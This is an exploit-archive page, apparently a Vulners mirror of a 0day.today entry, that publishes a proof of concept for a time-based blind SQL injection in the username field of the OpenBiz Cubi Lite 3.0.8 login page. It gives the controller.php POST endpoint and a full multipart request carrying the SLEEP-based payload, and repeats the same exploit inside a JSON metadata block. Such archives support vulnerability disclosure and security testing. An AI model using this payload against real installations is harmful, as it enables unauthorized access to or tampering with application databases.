Search...

OpenBiz Cubi Lite 3.0.8 - username SQL Injection Vulnerability

2018-11-07T00:00:00

ID 1337DAY-ID-31553
Type zdt
Reporter AkkuS
Modified 2018-11-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://sourceforge.net/projects/bigchef/
# Software Link: https://sourceforge.net/projects/bigchef/files/latest/download
# Version: v3.0.8
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Description: Cubi Platform login page is prone to an SQL-injection vulnerability.
# Exploiting this issue could allow an attacker to compromise the application,
# access or modify data, or exploit latent  vulnerabilities in the underlying database.
#########################################################
# PoC : SQLi :
 
# POST : POST
/bin/controller.php?F=RPCInvoke&P0=[user.form.LoginForm]&P1=[Login]&__this=btn_login:onclick&_thisView=user.view.LoginView&jsrs=1
# Parameter: MULTIPART username ((custom) POST)
     Type: AND/OR time-based blind
     Title: MySQL &gt;= 5.0.12 AND time-based blind
 
 
# Payload:
 
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="username"
 
admin' AND SLEEP(5)-- JgaK
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="password"
 
password
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"
 
Don't save session
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="session_timeout"
 
0
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"
 
English ( en_US )
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="current_language"
 
en_US
-----------------------------71911072106778878648823492
Content-Disposition: form-data; name="btn_client_login"
 
 
-----------------------------71911072106778878648823492--

#  0day.today [2018-11-07]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-31553", "bulletinFamily": "exploit", "title": "OpenBiz Cubi Lite 3.0.8 - username SQL Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-11-07T00:00:00", "modified": "2018-11-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31553", "reporter": "AkkuS", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-11-07T22:58:29", "edition": 1, "viewCount": 255, "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-11-07T22:58:29", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/TFTP/QUICK_TFTP_PRO_MODE", "MSF:EXPLOIT/WINDOWS/BROWSER/AOL_ICQ_DOWNLOADAGENT", "MSF:EXPLOIT/WINDOWS/MISC/BORLAND_STARTEAM"]}], "modified": "2018-11-07T22:58:29", "rev": 2}, "vulnersScore": -0.3}, "sourceHref": "https://0day.today/exploit/31553", "sourceData": "# Exploit Title: OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection\r\n# Exploit Author: \u00d6zkan Mustafa Akku\u015f (AkkuS)\r\n# Contact: https://pentest.com.tr\r\n# Vendor Homepage: https://sourceforge.net/projects/bigchef/\r\n# Software Link: https://sourceforge.net/projects/bigchef/files/latest/download\r\n# Version: v3.0.8\r\n# Category: Webapps\r\n# Tested on: XAMPP for Linux 1.7.2\r\n# Description: Cubi Platform login page is prone to an SQL-injection vulnerability.\r\n# Exploiting this issue could allow an attacker to compromise the application,\r\n# access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n#########################################################\r\n# PoC : SQLi :\r\n \r\n# POST : POST\r\n/bin/controller.php?F=RPCInvoke&P0=[user.form.LoginForm]&P1=[Login]&__this=btn_login:onclick&_thisView=user.view.LoginView&jsrs=1\r\n# Parameter: MULTIPART username ((custom) POST)\r\n Type: AND/OR time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind\r\n \r\n \r\n# Payload:\r\n \r\n-----------------------------71911072106778878648823492\r\nContent-Disposition: form-data; name=\"username\"\r\n \r\nadmin' AND SLEEP(5)-- JgaK\r\n-----------------------------71911072106778878648823492\r\nContent-Disposition: form-data; name=\"password\"\r\n \r\npassword\r\n-----------------------------71911072106778878648823492\r\nContent-Disposition: form-data; name=\"session_timeout\"\r\n \r\nDon't save session\r\n-----------------------------71911072106778878648823492\r\nContent-Disposition: form-data; name=\"session_timeout\"\r\n \r\n0\r\n-----------------------------71911072106778878648823492\r\nContent-Disposition: form-data; name=\"current_language\"\r\n \r\nEnglish ( en_US )\r\n-----------------------------71911072106778878648823492\r\nContent-Disposition: form-data; name=\"current_language\"\r\n \r\nen_US\r\n-----------------------------71911072106778878648823492\r\nContent-Disposition: form-data; name=\"btn_client_login\"\r\n \r\n \r\n-----------------------------71911072106778878648823492--\n\n# 0day.today [2018-11-07] #"}